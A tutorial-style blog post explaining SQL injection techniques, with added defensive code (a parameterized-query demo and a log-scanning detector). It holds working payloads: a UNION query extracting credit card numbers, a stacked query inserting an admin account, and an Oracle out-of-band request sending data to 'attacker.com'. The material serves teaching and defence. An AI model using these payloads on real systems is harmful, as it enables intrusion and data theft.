SQL Injection Exploit Techniques – All things in moderation

SQL Injection Exploit Techniques

What is SQL injection?

SQL Injection is one of many web attack types: an attacker sends a request containing malicious SQL statements, which are then executed by the database server.

With a successful SQL injection exploit an attacker can read sensitive data from the database, modify database data (INSERT/UPDATE/DELETE), execute administrative operations on the database (such as shutting down the DBMS), read or write files on the underlying system, and execute OS commands.

Common techniques to exploit SQLi

  • Union query: can be used when the SQLi flaw occurs in a SELECT statement.
  • Boolean: used to determine whether certain conditions are true or false.
  • Time delay: uses database commands (e.g. sleep) to delay the answer to a conditional query.
  • Error based: forces the database to generate an error, giving the attacker or tester information with which to refine the injection.
  • Stacked query: uses multiple queries separated by ";".
  • Out-of-band: data is retrieved through a different channel.

SQL injection Exploit techniques

  • The first step is for the tester to make a list of all input fields whose values could be used in crafting a SQL query (GET parameters, POST data, the User-Agent header, cookie values, ...).

Then check whether each one can be injected by adding characters such as: ' " ; # -- /**/ AND OR @@
If the input is not filtered, this will often produce a database error such as:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the 
character string ''.
/target/target.asp, line 20
  • After detecting a SQL injection vulnerability, you can use one of the following exploit techniques:

1. Union query

The UNION operator is used in SQL to combine the results of two queries. The result of the injected query is joined to the result of the original query, allowing the tester to obtain values from other tables.

Example:

SELECT id, name FROM Users WHERE id=$id

If $id is set to the injected value, the query becomes:

SELECT id, name FROM Users WHERE id=1 UNION ALL SELECT creditCardNumber,1 FROM CreditCardTable

which joins the result of the original query with all the credit card numbers in CreditCardTable.

To exploit a UNION query, the first step is to find the number of columns returned by the original SELECT statement:

?id=1 ORDER BY 10--

If the query fails, there must be fewer than 10 columns returned by the query:

Unknown column '10' in 'order clause'

If the query executes successfully, the tester can assume, in this example, that there are 10 or more columns in the SELECT statement.
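The vulnerable query from this section beside its parameterized form, as an added example that is not part of the original article. It uses Python's sqlite3 in-memory database with constructed sample tables standing in for Users and CreditCardTable (the card numbers are placeholders), and shows that the same UNION value leaks rows when concatenated into the statement but matches nothing when bound as a parameter.

```python
import sqlite3

# Constructed in-memory database standing in for the article's Users and
# CreditCardTable tables (placeholder data, not real card numbers).
def build_db():
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE Users (id INTEGER, name TEXT)")
    cur.executemany("INSERT INTO Users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    cur.execute("CREATE TABLE CreditCardTable (creditCardNumber TEXT)")
    cur.executemany("INSERT INTO CreditCardTable VALUES (?)",
                    [("4111-SAMPLE-0001",), ("4111-SAMPLE-0002",)])
    conn.commit()
    return conn

# Vulnerable form: $id is concatenated into the statement, exactly as in
# "SELECT id, name FROM Users WHERE id=$id" above, so SQL in the value is parsed.
def lookup_vulnerable(conn, user_id):
    sql = "SELECT id, name FROM Users WHERE id=" + user_id
    return conn.execute(sql).fetchall()

# Hardened form: the value is bound as a parameter, so it is only ever compared
# against the id column and can never change the shape of the query.
def lookup_parameterized(conn, user_id):
    sql = "SELECT id, name FROM Users WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()

# The injected $id value shown in the article.
PAYLOAD = "1 UNION ALL SELECT creditCardNumber,1 FROM CreditCardTable"

if __name__ == "__main__":
    conn = build_db()
    print(lookup_vulnerable(conn, PAYLOAD))      # original row plus both card rows
    print(lookup_parameterized(conn, PAYLOAD))   # [] : no id equals that string
```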

2. Boolean

The boolean exploitation technique is very useful when the attacker finds a blind SQL injection situation, in which nothing is known about the outcome of an operation. For example, in MySQL the following functions can be used.

SUBSTRING(string, start, length): returns a substring starting from position "start" of "string" and of length "length". If "start" is greater than the length of the string, the function returns a null value.
ASCII(char): returns the ASCII value of the input character. A null value is returned if char is 0.
LENGTH(string): returns the number of characters in the input string.

Using these functions, we run our tests on the first character and, once its value is discovered, move on to the second, and so on until the entire value has been discovered.

Example of a boolean-based blind SQL injection attack: http://hydrasky.com/2016/05/17/webgoat-attack-blind-sql-injection/

3. Time delay

Similar to boolean-based blind, time-based blind also uses the SUBSTRING, ASCII and LENGTH functions and discovers the string one character at a time until its end. The difference is that the result is inferred by measuring the time the web application takes to answer a request. A typical approach uses the WAITFOR DELAY command in MSSQL Server, or BENCHMARK() and SLEEP() in MySQL.

4. Error-based

The error-based exploitation technique consists in forcing the database to perform an operation whose result is an error. The point is to extract some data from the database and have it shown in the error message. The details of this technique differ from DBMS to DBMS.

Example:

Consider the following URL:

http://www.example.com/index.php?id=1

The malicious request would be:

http://www.example.com/index.php?id=1||UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )--

In this example the Oracle function UTL_INADDR.GET_HOST_NAME tries to return the host name of the parameter passed to it, which is another query returning the name of the database user. When the database looks up a host name equal to the database user name, the lookup fails and returns an error message like:

ORA-292257: host SCOTT unknown

The tester can then manipulate the parameter passed to the GET_HOST_NAME() function, and the result is shown in the error message.

5. Stacked query

This technique uses multiple queries separated by ";".

Example:

Consider the following URL:

http://www.example.com/index.php?id=1

The malicious request would be:

http://www.example.com/index.php?id=1; INSERT INTO users(username, password, admin) VALUES("admin", "admn_password", 1); --

In this example the DBMS is MS SQL Server. The attacker tries to insert a user with admin permissions into the users table.

This article covers the basics of how SQL injection is used. Each specific technique will be presented in more detail in a later post.

6. Out of band

This technique is very useful when the tester finds a blind SQL injection situation: the data is received through another channel. This technique is supported by the Oracle database.

Example:

Consider the following URL:

http://www.example.com/index.php?id=1

The malicious request would be:

http://www.example.com/index.php?id=1||UTL_HTTP.request('attacker.com:80'||(SELECT user FROM DUAL)--

In this example the function UTL_HTTP.request tries to connect to attacker.com:80 and makes an HTTP GET request whose path contains the result of the query "SELECT user FROM DUAL".
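From the defender's side, the probe characters and technique-specific keywords this article lists are also what a log review looks for. The following is an added example, not code from the original article: a small Python scanner that URL-decodes the request path of each combined-format access log line and labels it with the technique names used above. The log lines are constructed samples built from the requests shown in this article, and the signature set is an assumption (a triage signal, not a WAF; the single-quote and `--` patterns in particular will match legitimate traffic).

```python
import re
from urllib.parse import unquote_plus

# Signatures keyed by the technique names this article uses. They run over the
# URL-decoded request path; the patterns are deliberately narrow and case-insensitive.
SIGNATURES = {
    "union": re.compile(r"\bunion\b(\s|/\*.*?\*/)+(all\s+)?select\b", re.I),
    "column-probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "time-delay": re.compile(r"\b(sleep|benchmark)\s*\(|waitfor\s+delay\b", re.I),
    "error-based-oracle": re.compile(r"\butl_inaddr\.", re.I),
    "stacked": re.compile(r";\s*(insert|update|delete|drop|exec)\b", re.I),
    "out-of-band-oracle": re.compile(r"\butl_http\.", re.I),
    "probe-chars": re.compile(r"""(--|#|/\*\*/|@@|['";])"""),  # noisy; triage only
}

# Combined-format request line: client IP, timestamp, method, path, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def classify(request_path):
    """Return the technique labels whose signature matches the decoded path."""
    decoded = unquote_plus(request_path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines):
    """Return (client_ip, status, labels) for every log line that trips a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            labels = classify(m.group(2))
            if labels:
                hits.append((m.group(1), m.group(3), labels))
    return hits

# Constructed sample log: one benign request, then the quote probe, the column-count
# probe, the UNION query and the stacked query from this article, URL-encoded as a
# browser would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/May/2016:10:01:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [17/May/2016:10:01:09 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 210',
    '10.0.0.5 - - [17/May/2016:10:01:15 +0000] "GET /index.php?id=1+ORDER+BY+10-- HTTP/1.1" 500 210',
    '10.0.0.5 - - [17/May/2016:10:01:30 +0000] "GET /index.php?id=1+UNION+ALL+SELECT+creditCardNumber,1+FROM+CreditCardTable HTTP/1.1" 200 900',
    '10.0.0.9 - - [17/May/2016:10:02:00 +0000] "GET /index.php?id=1%3B+INSERT+INTO+users(username,password,admin)+VALUES(%22admin%22,%22x%22,1)%3B+-- HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, status, labels in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} techniques={','.join(labels)}")
```

A 500 response following a quote probe from the same client, then a successful UNION request with a larger response body, is the sequence the sections above describe and is worth alerting on as a whole rather than per line.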
